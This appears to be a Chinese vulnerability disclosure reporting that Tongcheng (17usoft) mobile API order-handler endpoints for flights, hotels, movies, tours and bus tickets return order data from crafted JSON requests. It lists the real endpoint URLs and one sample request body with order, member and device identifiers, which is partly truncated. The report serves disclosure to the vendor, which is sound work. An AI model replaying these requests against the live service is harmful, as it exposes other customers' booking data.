在某处看到同程移动端求测的状态我就来了,高rank 送京东礼品卡

类似一样的漏洞 以前在某处提交过 厂商说此问题之前有发现,评级低!
怎么现在有出现这种问题了呢? 羞羞的
UARL: http://tcmobileapi.17usoft.com/memberextend/
1.机票接口地址:http://tcmobileapi.17usoft.com/flight/orderhandler.ashx
JSON
tID" : "5ee7b429-b8c6-400f-8b87-3c384c4ea68a"
},
"body" : {
"orderId" : "137733308",
"endorseSubType" : "11",
"requestType" : "1",
"clientInfo" : {
"refId" : "5866741",
"mac" : "10685e02588a205a100baa911e483423",
"clientIp" : "192.168.1.103",
"networkType" : "wifi",
"extend" : "2^com.tongcheng.iphone,4^8.4,5^iPhone5_2",
"versionType" : "iPhone",
"deviceId" : "4eaf3c51d6b4846d8599c297d9eb94347b64d4f8",
"versionNumber" : "7.5.0"
},
"endorseType" : "1",
"memberId" : "I0_d697650ed0d55a266b81ef6c18fdad5d"
}
}</code>

JSON输入后点击 提交(>=750) 查询
2.酒店接口地址:http://tcmobileapi.17usoft.com/hotel/orderhandler.ashx
JSON

3.电影接口地址:http://tcmobileapi.17usoft.com/Movie/OrderHandler.ashx
JSON

4.旅游接口地址:http://tcmobileapi.17usoft.com/scenery/orderhandler.ashx
JSON

5汽车票接口地址:http://tcmobileapi.17usoft.com/bus/OrderHandler.ashx
JSON

还有其他接口我就不测试了 你比我还懂的